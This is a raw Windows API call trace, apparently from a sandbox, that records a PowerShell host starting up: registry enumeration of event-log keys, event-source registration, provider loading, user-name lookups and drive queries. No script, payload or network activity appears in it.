	[0776.563] CoTaskMemFree (pv=0x0) 
	[0776.563] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.563] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.563] CoTaskMemFree (pv=0x2c73a0) 
	[0776.563] CoTaskMemFree (pv=0x0) 
	[0776.563] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.563] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.563] CoTaskMemFree (pv=0x2c73a0) 
	[0776.563] CoTaskMemFree (pv=0x0) 
	[0776.563] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.563] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.563] CoTaskMemFree (pv=0x2c73a0) 
	[0776.563] CoTaskMemFree (pv=0x0) 
	[0776.563] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.563] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.563] CoTaskMemFree (pv=0x2c73a0) 
	[0776.563] CoTaskMemFree (pv=0x0) 
	[0776.564] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.564] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.564] CoTaskMemFree (pv=0x2c73a0) 
	[0776.564] CoTaskMemFree (pv=0x0) 
	[0776.564] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.564] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.564] CoTaskMemFree (pv=0x2c73a0) 
	[0776.564] CoTaskMemFree (pv=0x0) 
	[0776.564] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.564] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.564] CoTaskMemFree (pv=0x2c73a0) 
	[0776.564] CoTaskMemFree (pv=0x0) 
	[0776.564] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x374) returned 0x0
	[0776.564] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.564] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x398) returned 0x0
	[0776.565] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.565] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x39c) returned 0x0
	[0776.565] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.565] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3a0) returned 0x0
	[0776.565] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.565] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3a4) returned 0x0
	[0776.565] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.566] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3a8) returned 0x0
	[0776.566] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.566] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3ac) returned 0x0
	[0776.566] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.566] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3b0) returned 0x0
	[0776.566] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0776.566] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3b4) returned 0x0
	[0776.566] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3b8) returned 0x0
	[0776.566] RegCloseKey (hKey=0x3b8) returned 0x0
	[0776.567] RegCloseKey (hKey=0x394) returned 0x0
	[0776.567] RegCloseKey (hKey=0x3b4) returned 0x0
	[0777.947] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b6b0008
	[0778.884] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3050338*="WSMan", lpRawData=0x30500a8) returned 1
	[0778.888] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0778.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.888] CoTaskMemFree (pv=0x27b790) 
	[0778.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.890] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0778.890] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0778.891] CoTaskMemFree (pv=0x1b81d560) 
	[0778.891] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0778.891] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0778.891] CoTaskMemFree (pv=0x2c73a0) 
	[0778.892] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3055870*="Alias", lpRawData=0x3055600) returned 1
	[0778.898] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0778.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.898] CoTaskMemFree (pv=0x27b790) 
	[0778.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.901] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0778.901] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0778.901] CoTaskMemFree (pv=0x1b81d560) 
	[0778.901] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0778.901] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0778.901] CoTaskMemFree (pv=0x2c73a0) 
	[0778.905] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x305ae68*="Environment", lpRawData=0x305abf8) returned 1
	[0778.911] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0778.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.911] CoTaskMemFree (pv=0x27b790) 
	[0778.912] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0778.912] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0778.912] CoTaskMemFree (pv=0x27b790) 
	[0778.913] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0778.913] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0778.913] CoTaskMemFree (pv=0x27b790) 
	[0778.913] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0778.913] SetErrorMode (uMode=0x1) returned 0x1
	[0778.913] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd1a0 | out: lpFileInformation=0xcd1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.913] SetErrorMode (uMode=0x1) returned 0x1
	[0778.915] GetLogicalDrives () returned 0x4
	[0778.915] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.916] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.916] SetErrorMode (uMode=0x1) returned 0x1
	[0778.917] CoTaskMemAlloc (cb=0x68) returned 0x1b804f10
	[0778.917] CoTaskMemAlloc (cb=0x68) returned 0x1b805840
	[0778.918] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b804f10, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd170, lpMaximumComponentLength=0xcd16c, lpFileSystemFlags=0xcd168, lpFileSystemNameBuffer=0x1b805840, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd170*=0x9c354b42, lpMaximumComponentLength=0xcd16c*=0xff, lpFileSystemFlags=0xcd168*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0778.918] CoTaskMemFree (pv=0x1b804f10) 
	[0778.918] CoTaskMemFree (pv=0x1b805840) 
	[0778.918] SetErrorMode (uMode=0x1) returned 0x1
	[0778.918] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.919] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.920] SetErrorMode (uMode=0x1) returned 0x1
	[0778.920] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.920] SetErrorMode (uMode=0x1) returned 0x1
	[0778.920] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.920] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.921] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.925] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.926] SetErrorMode (uMode=0x1) returned 0x1
	[0778.926] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.926] SetErrorMode (uMode=0x1) returned 0x1
	[0778.926] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.926] SetErrorMode (uMode=0x1) returned 0x1
	[0778.926] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.926] SetErrorMode (uMode=0x1) returned 0x1
	[0779.705] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0779.705] SetErrorMode (uMode=0x1) returned 0x1
	[0779.705] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0779.705] SetErrorMode (uMode=0x1) returned 0x1
	[0779.705] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0779.706] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0779.706] CoTaskMemFree (pv=0x1b81d560) 
	[0779.706] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0779.706] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0779.706] CoTaskMemFree (pv=0x2c73a0) 
	[0779.707] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3061f58*="FileSystem", lpRawData=0x3061ce8) returned 1
	[0779.989] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0779.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.989] CoTaskMemFree (pv=0x27b790) 
	[0779.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.991] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0779.991] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0779.992] CoTaskMemFree (pv=0x1b81d560) 
	[0779.992] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0779.992] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0779.992] CoTaskMemFree (pv=0x2c73a0) 
	[0779.993] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3067798*="Function", lpRawData=0x3067528) returned 1
	[0780.002] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0780.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.002] CoTaskMemFree (pv=0x27b790) 
	[0780.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0780.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0783.435] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0783.435] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0783.435] CoTaskMemFree (pv=0x1b81d560) 
	[0783.435] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0783.436] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0783.436] CoTaskMemFree (pv=0x2c73a0) 
	[0783.436] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e91e38*="Registry", lpRawData=0x2e91bc8) returned 1
	[0783.441] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0783.441] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0783.442] CoTaskMemFree (pv=0x1b81d560) 
	[0783.442] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0783.442] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0783.442] CoTaskMemFree (pv=0x2c73a0) 
	[0783.442] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e97250*="Variable", lpRawData=0x2e96fe0) returned 1
	[0783.444] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0783.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.444] CoTaskMemFree (pv=0x27b790) 
	[0783.446] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0783.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.446] CoTaskMemFree (pv=0x27b790) 
	[0787.935] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0787.935] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0787.935] CoTaskMemFree (pv=0x1b81d560) 
	[0787.935] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0787.935] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0787.936] CoTaskMemFree (pv=0x2c73a0) 
	[0787.936] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb99b8*="Certificate", lpRawData=0x2eb9748) returned 1
	[0788.994] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0788.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.994] CoTaskMemFree (pv=0x27b790) 
	[0788.996] CoTaskMemAlloc (cb=0x20e) returned 0x321f30
